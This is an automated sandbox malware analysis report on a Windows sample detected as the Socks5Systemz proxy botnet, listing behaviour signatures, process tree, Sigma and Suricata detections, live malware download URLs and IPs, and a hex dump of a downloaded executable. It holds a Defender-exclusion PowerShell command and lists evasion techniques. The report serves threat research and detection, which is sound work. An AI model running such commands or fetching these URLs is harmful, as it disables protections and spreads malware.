Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dxRwXy19pq.exe

Overview

General Information

Sample name:dxRwXy19pq.exe
renamed because original name is a hash value
Original sample name:87ce4dd757d1ff7d2755b42a9e021784.exe
Analysis ID:1632175
MD5:87ce4dd757d1ff7d2755b42a9e021784
SHA1:ae967c99b1f1cb07191cb1d1482f8ce56cd106db
SHA256:44381dcaf3805730f78eef801218182b308d5ef4d712a5636315f09f2a5e0065
Tags:exeuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Socks5Systemz
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to infect the boot sector
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has a writeable .text section
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • dxRwXy19pq.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\dxRwXy19pq.exe" MD5: 87CE4DD757D1FF7D2755B42A9E021784)
    • ded120f6-6c1d-18da-bc8d-0195720b2895.exe (PID: 6884 cmdline: "C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe" MD5: A875EFEC27F37FB4E42141BBA8771C65)
      • vbc.exe (PID: 3288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe MD5: A526DE1F9DE51E1ACBC6B8A492673174)
        • powershell.exe (PID: 7196 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7444 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe" MD5: 836220DE6E7653554717D2CA5C73F98E)
      • 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp" /SL5="$303D6,3759395,56832,C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe" MD5: 5B423B3A38BD502496B29853EC88923B)
        • photorecoverylib59.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe" -i MD5: 8938736B03801821146F1A0365C937F4)
  • svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5612 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 332 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 3276 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7936 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2472564067.0000000002C86000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    0000000E.00000002.2472654579.0000000002D31000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: powershell.exe PID: 7196JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: photorecoverylib59.exe PID: 7424JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          Process Memory Space: powershell.exe PID: 7444JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 3288, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7196, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 3288, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7196, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 3288, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7196, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 6924, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T20:18:15.102079+010020287653Unknown Traffic192.168.2.64968791.240.118.49443TCP
            2025-03-07T20:19:18.905080+010020287653Unknown Traffic192.168.2.649718176.113.115.96443TCP
            2025-03-07T20:19:25.339606+010020287653Unknown Traffic192.168.2.649720176.113.115.96443TCP
            2025-03-07T20:19:28.661592+010020287653Unknown Traffic192.168.2.649721176.113.115.96443TCP
            2025-03-07T20:19:32.233098+010020287653Unknown Traffic192.168.2.649723176.113.115.96443TCP
            2025-03-07T20:19:35.222327+010020287653Unknown Traffic192.168.2.649724176.113.115.96443TCP
            2025-03-07T20:19:38.445446+010020287653Unknown Traffic192.168.2.649725176.113.115.96443TCP
            2025-03-07T20:19:41.916959+010020287653Unknown Traffic192.168.2.649726176.113.115.96443TCP
            2025-03-07T20:19:45.067068+010020287653Unknown Traffic192.168.2.649727176.113.115.96443TCP
            2025-03-07T20:19:48.395615+010020287653Unknown Traffic192.168.2.649728176.113.115.96443TCP
            2025-03-07T20:19:52.074027+010020287653Unknown Traffic192.168.2.649729176.113.115.96443TCP
            2025-03-07T20:19:55.760999+010020287653Unknown Traffic192.168.2.649730176.113.115.96443TCP
            2025-03-07T20:19:58.779498+010020287653Unknown Traffic192.168.2.649731176.113.115.96443TCP
            2025-03-07T20:20:02.256685+010020287653Unknown Traffic192.168.2.649732176.113.115.96443TCP
            2025-03-07T20:20:05.391590+010020287653Unknown Traffic192.168.2.649733176.113.115.96443TCP
            2025-03-07T20:20:09.033789+010020287653Unknown Traffic192.168.2.649734176.113.115.96443TCP
            2025-03-07T20:20:12.497160+010020287653Unknown Traffic192.168.2.649735176.113.115.96443TCP
            2025-03-07T20:20:15.627870+010020287653Unknown Traffic192.168.2.649736176.113.115.96443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T20:18:10.134150+010020225501A Network Trojan was detected192.168.2.649684104.168.28.1080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T20:19:20.359099+010028032742Potentially Bad Traffic192.168.2.649718176.113.115.96443TCP
            2025-03-07T20:19:26.330980+010028032742Potentially Bad Traffic192.168.2.649720176.113.115.96443TCP
            2025-03-07T20:19:29.581029+010028032742Potentially Bad Traffic192.168.2.649721176.113.115.96443TCP
            2025-03-07T20:19:32.989033+010028032742Potentially Bad Traffic192.168.2.649723176.113.115.96443TCP
            2025-03-07T20:19:36.006101+010028032742Potentially Bad Traffic192.168.2.649724176.113.115.96443TCP
            2025-03-07T20:19:39.395563+010028032742Potentially Bad Traffic192.168.2.649725176.113.115.96443TCP
            2025-03-07T20:19:42.695310+010028032742Potentially Bad Traffic192.168.2.649726176.113.115.96443TCP
            2025-03-07T20:19:45.896707+010028032742Potentially Bad Traffic192.168.2.649727176.113.115.96443TCP
            2025-03-07T20:19:49.792814+010028032742Potentially Bad Traffic192.168.2.649728176.113.115.96443TCP
            2025-03-07T20:19:53.393684+010028032742Potentially Bad Traffic192.168.2.649729176.113.115.96443TCP
            2025-03-07T20:19:56.518810+010028032742Potentially Bad Traffic192.168.2.649730176.113.115.96443TCP
            2025-03-07T20:20:00.057270+010028032742Potentially Bad Traffic192.168.2.649731176.113.115.96443TCP
            2025-03-07T20:20:03.059024+010028032742Potentially Bad Traffic192.168.2.649732176.113.115.96443TCP
            2025-03-07T20:20:06.447963+010028032742Potentially Bad Traffic192.168.2.649733176.113.115.96443TCP
            2025-03-07T20:20:10.241878+010028032742Potentially Bad Traffic192.168.2.649734176.113.115.96443TCP
            2025-03-07T20:20:13.298122+010028032742Potentially Bad Traffic192.168.2.649735176.113.115.96443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: dxRwXy19pq.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://91.240.118.49/forsale/silk.exeAvira URL Cloud: Label: malware
            Source: https://91.240.118.49/forsale/silk.exe/Avira URL Cloud: Label: malware
            Source: http://104.168.28.10/001.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeAvira: detection malicious, Label: TR/Kryptik.zlcio
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exeAvira: detection malicious, Label: TR/Kryptik.zlcio
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exeReversingLabs: Detection: 72%
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeReversingLabs: Detection: 72%
            Source: C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)ReversingLabs: Detection: 72%
            Source: C:\Windows\Temp\VzUtW_3288.sysReversingLabs: Detection: 54%
            Multi AV Scanner detection for submitted file
            Source: dxRwXy19pq.exeVirustotal: Detection: 72%Perma Link
            Source: dxRwXy19pq.exeReversingLabs: Detection: 65%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,13_2_0045D230
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045D2E4 ArcFourCrypt,13_2_0045D2E4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045D2FC ArcFourCrypt,13_2_0045D2FC
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_10001000 ISCryptGetVersion,13_2_10001000
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_10001130 ArcFourCrypt,13_2_10001130
            Source: vbc.exe, 00000005.00000002.1371160311.000000014007F000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ac6672e3-e

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeUnpacked PE file: 14.2.photorecoverylib59.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Recovery Library_is1Jump to behavior
            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.6:49687 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49736 version: TLS 1.2
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00452AD4 FindFirstFileA,GetLastError,13_2_00452AD4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00475798 FindFirstFileA,FindNextFileA,FindClose,13_2_00475798
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,13_2_0046417C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,13_2_004645F8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,13_2_00462BF0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,13_2_00498FDC
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]0_2_00425949
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 4x nop then mov qword ptr [rcx+08h], rdx0_2_00488D60
            Source: global trafficTCP traffic: 192.168.2.6:49719 -> 45.93.20.230:2024
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 07 Mar 2025 19:18:10 GMTContent-Type: application/octet-streamContent-Length: 3161088Last-Modified: Thu, 12 Dec 2024 15:33:20 GMTConnection: keep-aliveETag: "675b0240-303c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 c0 91 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 b4 2f 00 00 86 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 2f 00 8c 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 91 b3 2f 00 00 20 00 00 00 b4 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 8c 85 00 00 00 e0 2f 00 00 86 00 00 00 b6 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 48 00 00 20 46 00 00 09 00 00 00 3d 00 00 06 30 8e 00 00 61 45 2f 00 90 47 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 16 2b 40 7e 24 00 00 04 2b 3c 2b 41 06 2c 1a 7e 25 00 00 04 7e 01 00 00 04 20 a0 00 00 00 28 81 00 00 06 28 91 00 00 06 2a 7e 25 00 00 04 7e 01 00 00 04 20 bd 00 00 00 28 81 00 00 06 28 91 00 00 06 2a 0a 2b bd 28 8e 00 00 06 2b bd 0a 2b bc 1e 02 28 4f 00 00 0a 2a 62 d0 02 00 00 02 2b 03 2b 08 2a 28 2d 00 00 0a 2b f6 28 86 00 00 06 2b f1 00 00 00 13 30 04 00 c3 00 00 00 02 00 00 11 12 00 18 1f 14 16 38 9a 00 00 00 12 01 18 1f 13 16 38 99 00 00 00 12 02 18 1f 13 16 38 98 00 00 00 7e 26 00 00 04 06 07 28 94 00 00 06 2c 1b 7e 25 00 00 04 7e 02 00 00 04 20 df 00 00 00 28 81 00 00 06 28 91 00 00 06 2b 19 7e 25 00 00 04 7e 02 00 00 04 20 1c 01 00 00 28 81 00 00 06 28 91 00 00 06 7e 26 00 00 04 07 08 28 94 00 00 06 2c 1a 7e 25 00 00 04 7e 02 00 00 04 20 5d 01 00 00 28 81 00 00 06 28 91 00 00 06 2a 7e 25 00 00 04 7e 02 00 00 04 20 9a 01 00 00 28 81 00 00 06 28 91 00 00 06 2a 28 50 00 00 0a 38 5c ff ff ff 28 50 00 00 0a 38 5d ff ff ff 28 50
            Source: Joe Sandbox ViewIP Address: 176.113.115.96 176.113.115.96
            Source: Joe Sandbox ViewIP Address: 104.168.28.10 104.168.28.10
            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
            Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.6:49684 -> 104.168.28.10:80
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49687 -> 91.240.118.49:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49718 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49721 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49725 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49732 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49729 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49733 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49734 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49736 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49727 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49724 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49723 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49731 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49735 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49720 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49726 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49730 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49728 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49718 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49733 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49732 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49729 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 176.113.115.96:443
